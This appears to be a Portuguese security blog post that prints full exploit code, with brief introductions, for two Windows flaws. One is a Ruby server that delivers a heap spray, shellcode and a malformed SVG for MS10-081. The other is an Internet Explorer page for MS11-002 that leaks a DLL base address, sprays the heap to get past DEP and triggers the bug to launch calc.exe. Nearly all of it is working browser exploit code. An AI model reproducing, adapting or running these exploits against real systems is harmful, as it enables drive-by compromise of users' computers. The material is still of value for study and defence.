

iPhone perdido? Passwords perdidas! Você: hacked


Pesquisadores alemães do Instituto Fraunhofer de Tecnologia da Informação Segura (SIT) demonstraram como recuperar logins e senhas armazenados em um iPhone 4 com a ajuda de jailbreak. Note que o ataque pressupõe posse física do aparelho — daí o cenário do iPhone perdido ou roubado.

Segue a prova de conceito (PoC) da técnica:


MS10-081: Windows Common Control Library (Comctl32) Heap Overflow

Não poderia deixar de postar a nova vulnerabilidade no Windows ;) A PoC abaixo (Ruby) sobe um servidor HTTP que entrega uma página com heap spray e um SVG cujo atributo transform começa com um nome de 65535 bytes — essa é a entrada malformada usada para provocar o heap overflow na Comctl32. Use apenas em ambiente de laboratório isolado: o servidor escuta em todas as interfaces.


#!/usr/bin/env ruby

# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
# Nephi Johnson

require 'socket'

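# Write a minimal HTTP/1.1 response on +sock+.
#
# sock:: anything responding to #write (a TCPSocket in this script)
# data:: response body, sent verbatim after the headers
# opts:: :code (status, default "200"), :message (reason phrase, default "OK"),
#        :type (Content-Type, default "text/html"), :desc (label for the log line)
#
# Returns true when the write succeeded and false when it raised (peer gone,
# socket already closed). The error is deliberately swallowed: the server
# loop only needs to know whether to keep talking to this client.
def http_send(sock, data, opts={})
 defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
 opts = defaults.merge(opts)

 date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
 # Content-Length counts bytes. String#length is the character count and
 # under-reports for multibyte bodies, which makes the client truncate the
 # response; bytesize is the correct value.
 headers = "HTTP/1.1 #{opts[:code]} #{opts[:message]}\r\n" +
 "Date: #{date_str}\r\n" +
 "Content-Length: #{data.bytesize}\r\n" +
 "Content-Type: #{opts[:type]}\r\n\r\n"
 puts "[+] Sending #{opts[:desc]}"
 begin
 sock.write(headers + data)
 rescue StandardError
 return false
 end
 true
end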

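# Read one chunk (up to 1024 bytes) from +sock+ into +out_str+, waiting at
# most +timeout+ seconds for the socket to become readable.
#
# out_str:: a String overwritten in place (String#replace) so the caller's
#           reference sees the data
# Returns true when data arrived, false on timeout, peer close or error.
# On timeout the socket is closed here; the server loop tolerates a second
# close ("cli.close rescue next").
#
# Fixes relative to the original: a chunk with no text before the first
# newline (peer closed -> "", or a bare "\n") made split(...)[0] nil and the
# log line raised TypeError, which the blanket `rescue Exception` then hid.
# Peer close is now reported as false explicitly, the log line cannot raise,
# and only StandardError is rescued so Interrupt/SystemExit still propagate.
def sock_read(sock, out_str, timeout=5)
 ready = Kernel.select([sock], [], [], timeout)
 unless ready
 sock.close
 return false
 end
 chunk = sock.recv(1024)
 # recv returning "" means the peer closed the connection: nothing to serve.
 return false if chunk.nil? || chunk.empty?
 out_str.replace(chunk)
 puts "[+] Received:"
 puts "    " + (out_str.split("\n")[0] || "")
 true
rescue StandardError
 false
end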

# Listening port: first CLI argument, else 55555 (TCPServer.open accepts the
# String form ARGV yields as well as an Integer).
port = ARGV.first || 55555

# Oversized SVG transform name, 65535 '!' bytes. The SVG below embeds it in a
# rect's transform attribute; it is the malformed input this PoC feeds to the
# vulnerable control library.
transform_name = "!" * 65535

# Malicious SVG served for any request line matching /GET.*svg/. The rect's
# transform attribute starts with the 65535-byte transform_name (interpolated
# below) followed by ordinary transform functions; this is the document the
# landing page loads in an iframe to trigger the overflow.
svg = <<-SVG
<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg xmlns="http://www.w3.org/2000/svg"
 xmlns:xlink="http://www.w3.org/1999/xlink">

 <rect x="50" y="50" height="110" width="110"
 style="fill: #ffffff"
 transform="#{transform_name}(10) translate(30) rotate(45 50 50)"
 >
 </rect>
 <text x="100" y="100">CLICK ME</text>
</svg>
SVG

# Landing page served for every other request. Its script sprays the heap:
# 2000 anchor elements each get an innerHTML of 0x800 UTF-16 units made of
# U+2100 padding (str_dup) followed by the payload, then poc.svg is loaded
# in an iframe. The payload is msfencoded windows/exec CMD=calc.exe (see the
# inline comment); the "%u9000%u9090%u9090" prefix is a small 0x90 pad in
# front of it.
html = <<-HTML
<html>
 <body>
 <script>
 <!--
 function str_dup(str, length) {
 var result = str;
 while(result.length < length) {
 result += result;
 }
 return result.substr(result.length - length);
 }

 var shellcode = unescape("%u9000%u9090%u9090") +
 // msfpayload windows/exec CMD=calc.exe R | msfencode -t js_le -b "\x00"
 unescape("%u39ba%ue680%udb4f%u29dc%ub1c9%ud933%u2474%u58f4" +
 "%u5031%u8313%u04c0%u5003%u6236%ub313%ueba0%u4cdc" +
 "%u8c30%ua955%u9e01%ub902%u2e33%uef40%uc5bf%u0404" +
 "%uab34%u2b80%u06fd%u02f7%ua6fe%uc837%ua83c%u13cb" +
 "%u0a10%udbf5%u4b65%u0132%u1985%u4deb%u8e37%u1098" +
 "%uaf8b%u1f4e%ud7b3%ue0eb%u6247%u30f5%uf9f7%ua8bd" +
 "%ua57c%uc81d%ub551%u8362%u0ede%u1210%u5f36%u24d9" +
 "%u0c76%u88e4%u4c7b%u2e20%u3b63%u4c5a%u3c1e%u2e99" +
 "%uc9c4%u883c%u6a8f%u28e5%uec5c%u266e%u7a29%u2b28" +
 "%uafac%u5742%u4e25%ud185%u757d%ub901%u1426%u6710" +
 "%u2989%ucf42%u8c76%ue208%ub663%u6952%u3a72%ud4e9" +
 "%u4474%u76f2%u751c%u1979%u8a5b%u5da8%uc093%uf4f1" +
 "%u8d3b%u4563%u2e26%u8a5e%uad5e%u736b%uada5%u7619" +
 "%u69e2%u0af1%u1c7b%ub9f5%u357c%u5c96%ud5ee%ufa77" +
 "%u7c96%u0e88");
 var base = str_dup(unescape("%u2100"), 0x800 - shellcode.length);
 var arr = [];
 for(var i = 0; i < 2000; i++) {
 arr[i] = document.createElement("a");
 arr[i].innerHTML = [base + shellcode].join("");
 }
 -->
 </script>
 <iframe width="100%" height="100%" src="poc.svg" marginheight="0" marginwidth="0"></iframe>
 </body>
</html>
HTML

puts "[+] Listening on port #{port}"
puts

# Single-threaded server. TCPServer.open with only a port binds every
# interface, so run this on an isolated lab network. Each connection may
# carry several requests: a request mentioning "svg" gets the malicious SVG,
# one containing QUIT terminates the process, anything else gets the landing
# page. A failed write or a read timeout ends the connection.
TCPServer.open(port) do |srv|
 loop do
 cli = srv.accept
 req = ""
 next unless sock_read(cli, req, 5)
 until req.empty?
 if req =~ /GET.*svg/i
 break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
 elsif req =~ /QUIT/
 exit()
 else
 break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
 end
 req = ""
 next unless sock_read(cli, req, 5)
 end
 cli.close rescue next
 end
end

MS11-002: Microsoft Data Access Components Vulnerability


Mensagem do dia: Fuck M$!

 


<html xmlns:t = "urn:schemas-microsoft-com:time">
 <head>
 <meta name="License" content="Q Public License;http://en.wikipedia.org/wiki/Q_Public_License">
 <!-- The empty <style> element is not decorative: RunExploit takes
      document.styleSheets[0].owningElement from it. -->
 <style>
 .body {

 }
 #test {

 }
 </style>
 <!-- heapLib.js is an external dependency that is not part of this listing;
      FaseTwo relies on heapLib.ie(...).alloc() from it. The page uses
      IE-only APIs throughout (XML data island recordsets, CollectGarbage,
      insertAdjacentElement, innerText). -->
 <script src="heapLib.js"></script>
 <script>
 // This code has been released under the Q Public License by Trolltech
 // http://en.wikipedia.org/wiki/Q_Public_License
 // Source: http://vreugdenhilresearch.nl/ms11-002-pwn2own-heap-overflow/


// Wall-clock start, used for the "Total exploitation time" readout.
var StartTime = new Date();

// Phase-two parameters: how many heap blocks to spray, how many have been
// sprayed so far, and the size of the small hole carved in phase one
// (0x1F0 was tried earlier; 0x240 is the value in use).
var FinalHeapSpraySize = 900;
var CurrentHeapSpraySize = 0;
var SmallHoleSize = 0x240;

// Progress counter for the AddNew/Delete churn in IncreaseRowCounter.
var GlobalRowCounter = 0;

// Recordsets of the XML data islands, bound in FaseOne.
var localxmlid1, localxmlid2, localxmlid3, localxmlid5;

// Base address of msado15.dll once FindADOBase has recovered it.
var adobase = 0;

// heapLib instance and the block it sprays, both built in FaseTwo.
var heap = null;
var finalspray = '';

// Remaining ticks of the countdown shown before RunExploit fires.
var ExpoitTime = 10;


// Entry point scheduled from <body onLoad>: hands control to phase one.
// Later phases chain themselves through window.setTimeout.
function Start() {
 var firstPhase = FaseOne;
 firstPhase();
}



// Phase one: bind the XML data island recordsets and perform a fixed sequence
// of AddNew/MoveFirst/Close calls on them. The exact heap layout this
// produces is not visible from the page; the on-page text calls it
// "Setting up data for ASLR evasion" and the row churn continues in
// IncreaseRowCounter. The Math.atan2(0xbabe, ...) calls have no effect on
// the page -- presumably markers to spot in a debugger trace.
function FaseOne() {

 localxmlid1 = document.getElementById('xmlid1').recordset;
 localxmlid2 = document.getElementById('xmlid2').recordset;
 localxmlid3 = document.getElementById('xmlid3').recordset;
 localxmlid5 = document.getElementById('xmlid5').recordset;

 // Very large cache size on xmlid2 -- its purpose is not explained here.
 localxmlid2.CacheSize = 0x40000358;

 // xmlid1 is sized to SmallHoleSize and then closed and garbage-collected
 // below, which appears to be how the "small hole" is carved.
 localxmlid1.CacheSize = SmallHoleSize;;   // small hole (author's note)
 localxmlid1.AddNew(["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"], ["c"]);
 localxmlid5.AddNew(["BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"], ["c"]);


 var my1field = localxmlid5.Fields.Item(0);
 localxmlid1.MoveFirst();

 localxmlid2.AddNew(["BBBB"], ["c"]);

 localxmlid1.Close();
 CollectGarbage();

 localxmlid3.MoveFirst();

 void(Math.atan2(0xbabe, ('###################### 2 Move First').toString()));
 localxmlid2.MoveFirst();

 void(Math.atan2(0xbabe, ('###################### 5 Move First').toString()));
 localxmlid5.CacheSize = 0x40000008;
 localxmlid5.MoveFirst();
 // The long field name is what FindADOBase later reads back through
 // myfield.Name/name; the second value carries a FINDME marker.
 localxmlid3.AddNew(["MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong"], ["cccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuFINDMEccccc"]);

 var localxmlid4 = document.getElementById('xmlid4').recordset;

 localxmlid4.AddNew(["bb"], ["c"]);

 localxmlid4.MoveNext();


 var localxmlid6 = document.getElementById('xmlid6').recordset;
 localxmlid6.AddNew(["CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"], ["c"]);

 localxmlid2.MoveFirst();

 // No visible effect; same debugger-marker pattern as the atan2 calls above.
 Math.tan(1);

 document.getElementById('textfaseone').innerText = 'Setting up data for ASLR evasion:';
 // GlobalRowCounter starts at 0, so this always schedules the row churn.
 if(GlobalRowCounter < 0x10120) {
 window.setTimeout(IncreaseRowCounter, 100);
 }
}


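// Phase one, step two: churn rows in xmlid2's recordset (AddNew followed by
// Delete, 0x300 per 100 ms tick) until GlobalRowCounter reaches 0x10120,
// updating the progress readout, then hand off to FindADOBase. Running on a
// timer keeps the page responsive during the ~21k iterations. The purpose of
// the churn is not visible here; the on-page text calls it "data for ASLR
// evasion".
//
// Fix: the loop counter `i` was an implicit global; it is now function-local.
function IncreaseRowCounter() {
 if(GlobalRowCounter < 0x10120) {
 for(var i = 0; i < 0x300; i++) {
 GlobalRowCounter++;
 localxmlid2.AddNew(["BBBB"], ["c"]);
 localxmlid2.Delete();
 }
 var percentcomplete = Math.round(GlobalRowCounter /0x10120 * 100);
 document.getElementById('progressfaseone').innerText = percentcomplete + "%";
 window.setTimeout(IncreaseRowCounter, 100);
 }
 else {
 document.getElementById('textfaseonedone').innerText = 'Now searching memory for suitable vtable. Please wait...';
 window.setTimeout(FindADOBase, 100);
 }
}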

// Phase one, step three: recover the load address of msado15.dll.
//
// First loop: keep adding rows to xmlid2 until the long field name of xmlid3
// no longer reads back as the string FaseOne stored -- i.e. until the memory
// behind the name has been overwritten (this appears to be the corruption
// that turns the field name into a window onto adjacent heap memory).
//
// Second loop: keep adding rows and read the name two UTF-16 units (one
// 32-bit value) at a time. escape() renders them as "%uLLLL%uHHHH"; the
// replace() swaps the halves into the big-endian hex string "HHHHLLLL".
// Two values whose low word is 0xAD68 resp. 0xD738 are taken as vftable
// pointers at fixed offsets (0x1AD68 and 0xD738) from the module base; if
// both agree on the same base, it is stored in adobase and FaseTwo starts.
// Note the property is read as both .Name and .name; COM property names
// are case-insensitive in IE, so both hit the same field.
function FindADOBase() {
 //alert('FindADOBase');


 var myfield = localxmlid3.Fields.Item(1);

 for(i = 0; i < 0xDF6; i++) {
 localxmlid2.AddNew(["BBBB"], ["c"]);
 localxmlid2.MoveFirst();
 if(myfield.Name != "MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong") {
 break;
 }
 }
 //alert('done first');

 void(Math.atan2(0xbabe, ('###################### Add untill vftable 2').toString()));

 var vftable1 = null;
 var vftable2 = null;

 for(i = 0; i < 0xAE0; i++) {
 void(Math.atan2(0xbabe, ('add row: ' + i).toString()));
 localxmlid2.AddNew(["BBBB"], ["c"]);
 localxmlid2.MoveFirst();
 //if(i > 10) {
 //  document.forms[0].myresult.value += i.toString(16) + " : " + escape(myfield.name.substr((2 * i) + 4, 8)) + " : "  + myfield.name.length + "\n";
 //}
 if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uAD68/)) {
 vftable1 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1");
 }
 if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uD738/)) {
 vftable2 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1");
 }
 if(vftable1  && vftable2) {
 break;
 }
 }
 //document.forms[0].myresult.value += "\n\nVFTABLES: " + vftable1 + " : " + vftable2 + "\n\n\n";
 //alert(vftable1);
 // Both candidates must yield the same base, otherwise one of them was a
 // false positive on the 16-bit pattern. parseInt(null, 16) is NaN, so a
 // missing candidate also lands in the failure branch.
 if((parseInt(vftable1,16) - 0x1AD68) == (parseInt(vftable2,16) - 0xD738)) {
 adobase = parseInt(vftable1,16) - 0x1AD68;
 // The address itself is deliberately not displayed (published version).
 document.getElementById('textfoundaddress').innerText = 'Found base address of <censored>.dll: 0x<censored>';// + adobase.toString(16);
 FaseTwo();
 }
 else {
 alert('sadly we failed to read the base address of msado15.dll 😦 ');
 }

}

// Phase two, step one: build the block that will be sprayed over the heap.
// The block is a fake object laid out around addresses inside msado15.dll
// (MakeAddressString(adobase + ...)), which is what the recovered base is
// needed for -- the on-page text calls this "DEP evasion", so these are
// presumably gadget/function addresses. It also embeds a short machine-code
// stub (the "%u9090%u9090%u868B..." run, ending in call eax / int3) and the
// strings "calc.exe" and "\system32\calc.exe" (decoded in the comment
// below). The other words ("%u0102", "%u0103", ...) are position markers
// so the layout can be checked in a debugger.
//
// The block is padded to 0x200 units, doubled up to 0x40000 and trimmed to
// finalspray, which SprayHeap then allocates through heapLib 900 times.
function FaseTwo() {
 document.getElementById('textfasetwo').innerText = 'Setting up heap for DEP evasion:';
 document.getElementById('progressfasetwo').innerText = '0%';
 heap = new heapLib.ie(0x20000);


 var heapspray = unescape("%u2020%u1604%u0102%u0103%u0104%u0105" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123" + MakeAddressString(adobase)  + "%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0)  + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F" +
 "%u9090%u9090%u868B%u1108%u0000%u5056%u056A%uA068%u0421%u0516%u185E%u0008%uD0FF%u5058%u0590%u0BBB%u0000%uD0FF%uF88B%u0558%u3B47%u0000%u006A%uFF57%uCCD0" + "%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF" +
 "%u6163%u636C%u652E%u6578%u0000%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578%u0000%u0000" + "%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + "%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF");
 // Decoding of the string section above (author's notes):
 //"%u6163%u636C%u652D%u6578%u0000
 //%u3A63%u775C%u6E69%u6F64%u7377%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578
 //c:\windows\system32\calc.exe
 //%63%61%6C%63%2E%65%78%65
 //%63%3A%5C%77%69%6E%64%6F%77%73%5C%73%79%73%74%65%6D%33%32%5C%63%61%6C%63%2E%65%78%65
 // (An earlier, commented-out variant of the spray string differing only in
 // its marker padding was kept here in the original; dropped for readability.)

 // Pad to 0x200 units, then double until the block is 0x40000 units long.
 while(heapspray.length < 0x200) heapspray += unescape("%u4444");

 var heapblock = heapspray;
 while(heapblock.length < 0x40000) heapblock += heapblock;
 // Trim a little off both ends (the exact margins are the author's choice).
 finalspray = heapblock.substring(2, 0x40000 - 0x21);

 //alert('Base address of ado15.dll ' + adobase.toString(16));
 // CurrentHeapSpraySize is still 0 on the first call, so the spray is
 // scheduled; the else branch only matters if this function is re-entered.
 if(CurrentHeapSpraySize < 900) {
 window.setTimeout(SprayHeap, 100);
 }
 else {
 RunExploit();
 }
}

// Phase two, step two: allocate `finalspray` 90 times per 100 ms tick until
// CurrentHeapSpraySize reaches FinalHeapSpraySize - 1, reporting progress,
// then show the countdown label and start RunExploitTimer.
function SprayHeap() {
 var sprayComplete = CurrentHeapSpraySize >= FinalHeapSpraySize - 1;
 if (sprayComplete) {
 document.getElementById('textfasetwodone').innerText = "Ready to start calc.exe in: ";
 window.setTimeout(RunExploitTimer, 100);
 return;
 }

 var remaining = 90;
 while (remaining-- > 0) {
 heap.alloc(finalspray);
 CurrentHeapSpraySize++;
 }
 var pct = Math.round(CurrentHeapSpraySize / FinalHeapSpraySize * 100);
 document.getElementById('progressfasetwo').innerText = pct + "%";
 window.setTimeout(SprayHeap, 100);
}

// Countdown before the trigger: shows ExpoitTime every 500 ms, decrementing
// it each tick; at zero it prints the total run time since StartTime and
// schedules RunExploit.
function RunExploitTimer() {
 var counter = document.getElementById('countexploitrun');
 if (ExpoitTime <= 0) {
 counter.innerText = 0;
 var elapsedSecs = Math.round((new Date().getTime() - StartTime.getTime()) / 1000);
 document.getElementById('totalruntime').innerText = "Total exploitation time: " + elapsedSecs + " seconds";
 window.setTimeout(RunExploit, 100);
 return;
 }
 counter.innerText = ExpoitTime;
 ExpoitTime--;
 window.setTimeout(RunExploitTimer, 500);
}

// Trigger. The sequence is: create 100 spare divs; take the <style> element
// (owningElement of the first stylesheet) and its imports collection; attach
// and detach the element, replace it via outerHTML, and force a garbage
// collection; then fill the divs' classNames with a string carrying the
// same "%u2020%u1604" words the sprayed block starts with; finally call
// insertAdjacentElement on the detached element. The last call appears to
// be what reaches the vulnerable code -- the page does not say more.
//
// owningObj, myimports, Result and i are left as implicit globals on
// purpose here: their lifetime across CollectGarbage() may matter for the
// heap state, so confirm before making them locals.
function RunExploit() {

 var elms = new Array();
 for(i =0; i < 100; i++) {
 elms.push(document.createElement('div'));
 }

 owningObj = document.styleSheets[0].owningElement;

 myimports = document.styleSheets[0].imports;

 document.appendChild(owningObj);
 document.removeChild(owningObj);

 owningObj.outerHTML = 'a';

 // atan2 calls are debugger markers (no effect on the page).
 Math.atan2(0xbabe, "Collect");
 CollectGarbage();

 Math.atan2(0xbabe, "spray");
 for(i = 0; i < 100; i++) {
 elms[i].className = unescape("%u4140%u4141%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u4153%u4154%u2020%u1604%u2020%u1604%u4159%u415a%u415b");
 }

 Result = owningObj.insertAdjacentElement(myimports,'a');


}

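// Render a 32-bit address as the "%uLLLL%uHHHH" escape pair that unescape()
// turns into the little-endian bytes of the address (low word first), for
// embedding in the heap spray string.
//
// Fix: the original relied on a regex that only matches exactly eight hex
// digits and silently returned the raw hex text for anything shorter (a
// module base below 0x10000000, for instance), corrupting the sprayed
// layout. The value is now masked to 32 bits and zero-padded first.
function MakeAddressString(addrint) {
 var addstr = (addrint >>> 0).toString(16);
 while (addstr.length < 8) {
 addstr = "0" + addstr;
 }
 // Swap the high and low 16-bit halves (little-endian order).
 return "%u" + addstr.substr(4, 4) + "%u" + addstr.substr(0, 4);
}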

 </script>

 </head>
 <body onLoad="window.setTimeout(Start,100);" id="bodyid">
 <div>
 <h2 id="textfaseone"></h2>
 <br>
 <h2 id="progressfaseone"></h2>
 <br>
 <h2 id="textfaseonedone"></h2>
 <br>
 <h2 id="textfoundaddress"></h2>
 <br>
